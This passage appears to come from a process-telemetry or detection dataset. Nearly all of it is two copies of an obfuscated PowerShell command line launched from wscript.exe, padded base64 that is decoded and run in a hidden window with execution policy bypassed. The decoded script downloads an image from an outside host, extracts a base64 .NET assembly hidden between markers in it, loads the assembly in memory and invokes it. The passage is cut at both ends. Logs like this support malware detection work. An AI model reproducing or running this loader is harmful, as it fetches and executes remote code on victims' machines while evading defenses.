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L7AuOvhPbYLCQAuOvhPbYLZQBuAuOvhPbYLGQAuOvhPbYLSQBuAuOvhPbYLGQAuOvhPbYLZQB4AuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLaQBtAuOvhPbYLGEAuOvhPbYLZwBlAuOvhPbYLFQAuOvhPbYLZQB4AuOvhPbYLHQAuOvhPbYLLgBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLTwBmAuOvhPbYLCgAuOvhPbYLJAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBGAuOvhPbYLGwAuOvhPbYLYQBnAuOvhPbYLCkAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLHMAuOvhPbYLdAuOvhPbYLBhAuOvhPbYLHIAuOvhPbYLdAuOvhPbYLBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLGcAuOvhPbYLZQAuOvhPbYLgAuOvhPbYLDAuOvhPbYLAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLGcAuOvhPbYLdAuOvhPbYLAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYLgAuOvhPbYLCsAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLLgBMAuOvhPbYLGUAuOvhPbYLbgBnAuOvhP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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('AuOvhPbYL','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" | ||||||
parent_process | wscript.exe | martian_process | powershell -command "$Codigo = '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hPbYLGEAuOvhPbYLbgBkAuOvhPbYLCkAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLGwAuOvhPbYLbwBhAuOvhPbYLGQAuOvhPbYLZQBkAuOvhPbYLEEAuOvhPbYLcwBzAuOvhPbYLGUAuOvhPbYLbQBiAuOvhPbYLGwAuOvhPbYLeQAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLBbAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLUgBlAuOvhPbYLGYAuOvhPbYLbAuOvhPbYLBlAuOvhPbYLGMAuOvhPbYLdAuOvhPbYLBpAuOvhPbYLG8AuOvhPbYLbgAuOvhPbYLuAuOvhPbYLEEAuOvhPbYLcwBzAuOvhPbYLGUAuOvhPbYLbQBiAuOvhPbYLGwAuOvhPbYLeQBdAuOvhPbYLDoAuOvhPbYLOgBMAuOvhPbYLG8AuOvhPbYLYQBkAuOvhPbYLCgAuOvhPbYLJAuOvhPbYLBjAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLEIAuOvhPbYLeQB0AuOvhPbYLGUAuOvhPbYLcwAuOvhPbYLpAuOvhPbYLDsAuOvhPbYLJAuOvhPbYLB0AuOvhPbYLHkAuOvhPbYLcAuOvhPbYLBlAuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLbAuOvhPbYLBvAuOvhPbYLGEAuOvhPbYLZAuOvhPbYLBlAuOvhPbYLGQAuOvhPbYLQQBzAuOvhPbYL